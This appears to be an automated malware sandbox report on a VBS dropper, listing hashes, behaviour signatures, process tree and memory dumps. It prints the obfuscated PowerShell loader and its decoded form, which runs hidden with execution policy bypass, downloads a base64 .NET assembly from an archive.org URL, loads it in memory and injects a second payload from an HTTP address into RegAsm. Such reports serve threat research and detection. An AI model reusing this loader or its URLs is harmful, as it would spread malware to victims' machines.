Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    12-09-2024 12:24

General

  • Target

    0x000300000000b3e3-94.vbs

  • Size

    194KB

  • MD5

    914253e6225b686ee3e0a752c1cd1bb4

  • SHA1

    42e9ae719f4dfd04e7dcb9d58a911eb37fd3439c

  • SHA256

    00f52a2f56551d868397acd11e4d12c353d7107ce680c6ff00012a90dabc818b

  • SHA512

    92ecf4249ef488d95a657a3e920316cc816e2e8d5d2b8e257e4ce074626beda95d379034c86758ac7a1623354cfe2cba14bf811f73f3a35fe97e3610d85c9e3b

  • SSDEEP

    3072:7tduXlp2G4E2A0w8Vf0DyQPrWDgt5pUGw1piL71OkHiMZzvcqgp3yO9pj2t7tK:JW2Gp9b8tPQPacR9vctpiO9pjGtK

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
    exe.dropper
    https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request (2 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)

    Run Powershell and hide display window.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0x000300000000b3e3-94.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⛮ ䷖ ⧉ ┕ ⽚B1⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚D0⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Gg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚H⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚cw⛮ ䷖ ⧉ ┕ ⽚6⛮ ䷖ ⧉ ┕ ⽚C8⛮ ䷖ ⧉ ┕ ⽚LwBp⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚Ng⛮ ䷖ ⧉ ┕ ⽚w⛮ ䷖ ⧉ ┕ ⽚D⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚MQ⛮ ䷖ ⧉ ┕ ⽚w⛮ ䷖ ⧉ ┕ ⽚D⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚LgB1⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚LgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚YwBo⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBl⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚bwBy⛮ ䷖ ⧉ ┕ ⽚Gc⛮ ䷖ ⧉ ┕ ⽚Lw⛮ ䷖ ⧉ ┕ ⽚y⛮ ䷖ ⧉ ┕ ⽚DQ⛮ ䷖ ⧉ ┕ ⽚LwBp⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚LwBk⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bh⛮ ䷖ ⧉ ┕ ⽚Gg⛮ ䷖ ⧉ ┕ ⽚LQBu⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚C0⛮ ䷖ ⧉ ┕ ⽚dg⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚EQ⛮ ䷖ ⧉ ┕ ⽚ZQB0⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚BO⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚FY⛮ ䷖ ⧉ ┕ ⽚LgB0⛮ ䷖ ⧉ ┕ ⽚Hg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Ds⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚cwBl⛮ ䷖ ⧉ ┕ ⽚DY⛮ ䷖ ⧉ ┕ ⽚N⛮ ䷖ ⧉ ┕ ⽚BD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚TgBl⛮ ䷖ ⧉ ┕ ⽚Hc⛮ ䷖ ⧉ ┕ ⽚LQBP⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚agBl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚FM⛮ ䷖ ⧉ ┕ ⽚eQBz⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚TgBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚LgBX⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚YgBD⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚aQBl⛮ ䷖ ⧉ ┕ ⽚G4⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚p⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚R⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚Hc⛮ ䷖ ⧉ ┕ ⽚bgBs⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚YQBk⛮ ䷖ ⧉ ┕ ⽚FM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚By⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBn⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚B1⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚p⛮ ䷖ ⧉ ┕ ⽚Ds⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚eQBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Fs⛮ ䷖ ⧉ ┕ ⽚UwB5⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚LgBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB2⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚cgB0⛮ ䷖ ⧉ ┕ ⽚F0⛮ ䷖ ⧉ ┕ ⽚Og⛮ ䷖ ⧉ ┕ ⽚6⛮ ䷖ ⧉ ┕ ⽚EY⛮ ䷖ ⧉ ┕ ⽚cgBv⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚QgBh⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚ZQ⛮ ䷖ ⧉ ┕ ⽚2⛮ ䷖ ⧉ ┕ ⽚DQ⛮ ䷖ ⧉ ┕ ⽚UwB0⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚aQBu⛮ ䷖ ⧉ ┕ ⽚Gc⛮ 
䷖ ⧉ ┕ ⽚K⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚k⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚YQBz⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚Ng⛮ ䷖ ⧉ ┕ ⽚0⛮ ䷖ ⧉ ┕ ⽚EM⛮ ䷖ ⧉ ┕ ⽚bwBu⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBu⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚YQBz⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚B5⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Fs⛮ ䷖ ⧉ ┕ ⽚UgBl⛮ ䷖ ⧉ ┕ ⽚GY⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bp⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bg⛮ ䷖ ⧉ ┕ ⽚u⛮ ䷖ ⧉ ┕ ⽚EE⛮ ䷖ ⧉ ┕ ⽚cwBz⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bQBi⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚eQBd⛮ ䷖ ⧉ ┕ ⽚Do⛮ ䷖ ⧉ ┕ ⽚OgBM⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚YQBk⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚eQBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚Ck⛮ ䷖ ⧉ ┕ ⽚Ow⛮ ䷖ ⧉ ┕ ⽚k⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚eQBw⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚9⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bh⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚cwBl⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚YgBs⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚LgBH⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚BU⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚JwBS⛮ ䷖ ⧉ ┕ ⽚HU⛮ ䷖ ⧉ ┕ ⽚bgBQ⛮ ䷖ ⧉ ┕ ⽚EU⛮ ䷖ ⧉ ┕ ⽚LgBI⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚9⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚RwBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚TQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚K⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚FY⛮ ䷖ ⧉ ┕ ⽚QQBJ⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚LgBJ⛮ ䷖ ⧉ ┕ ⽚G4⛮ ䷖ ⧉ ┕ ⽚dgBv⛮ ䷖ ⧉ ┕ ⽚Gs⛮ ䷖ ⧉ ┕ ⽚ZQ⛮ ䷖ ⧉ ┕ ⽚o⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bgB1⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚s⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚WwBv⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚agBl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bb⛮ ䷖ ⧉ ┕ ⽚F0⛮ ䷖ ⧉ ┕ ⽚XQB⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚JwB0⛮ ䷖ ⧉ ┕ ⽚Hg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚u⛮ ䷖ ⧉ ┕ ⽚EM⛮ ䷖ ⧉ ┕ ⽚RgBD⛮ ䷖ ⧉ ┕ ⽚E4⛮ ䷖ ⧉ ┕ ⽚Ug⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚DM⛮ ䷖ ⧉ ┕ ⽚O⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚DE⛮ ䷖ ⧉ ┕ ⽚Nw⛮ ䷖ ⧉ ┕ ⽚x⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚MQ⛮ ䷖ ⧉ ┕ ⽚4⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚Mg⛮ ䷖ ⧉ ┕ ⽚x⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚O⛮ ䷖ ⧉ ┕ 
⽚⛮ ䷖ ⧉ ┕ ⽚5⛮ ䷖ ⧉ ┕ ⽚DE⛮ ䷖ ⧉ ┕ ⽚Lw⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚Do⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Cw⛮ ䷖ ⧉ ┕ ⽚JwBS⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚ZwBB⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚bQ⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Cw⛮ ䷖ ⧉ ┕ ⽚Jw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Ck⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⛮ ䷖ ⧉ ┕ ⽚','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt';$base64Content = (New-Object System.Net.WebClient).DownloadString($url);$binaryContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Reflection.Assembly]::Load($binaryContent);$type = $assembly.GetType('RunPE.Home');$method = $type.GetMethod('VAI');$method.Invoke($null, [object[]]@('txt.CFCNR/38/171.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:328

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    b81f53824c4a845f30d1d096a6d076de

    SHA1

    5368700fcbd8b6e166b0da466bef8556cce6293f

    SHA256

    09ed947228483276a71e1fe0d6774919e1516bd40bcf4a679b3dcc13db217be3

    SHA512

    d67221b34b406a95916186f326874e8b32a0e34f7a458285cc604d3fd6dc6376a1968991bf76550a81bb6439494572ee6bd662f4fe539456eff7435d0c4bf87d

  • memory/2176-4-0x000007FEF5C7E000-0x000007FEF5C7F000-memory.dmp

    Filesize

    4KB

  • memory/2176-7-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2176-6-0x00000000022E0000-0x00000000022E8000-memory.dmp

    Filesize

    32KB

  • memory/2176-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

    Filesize

    2.9MB

  • memory/2176-8-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2176-9-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2176-10-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2176-16-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB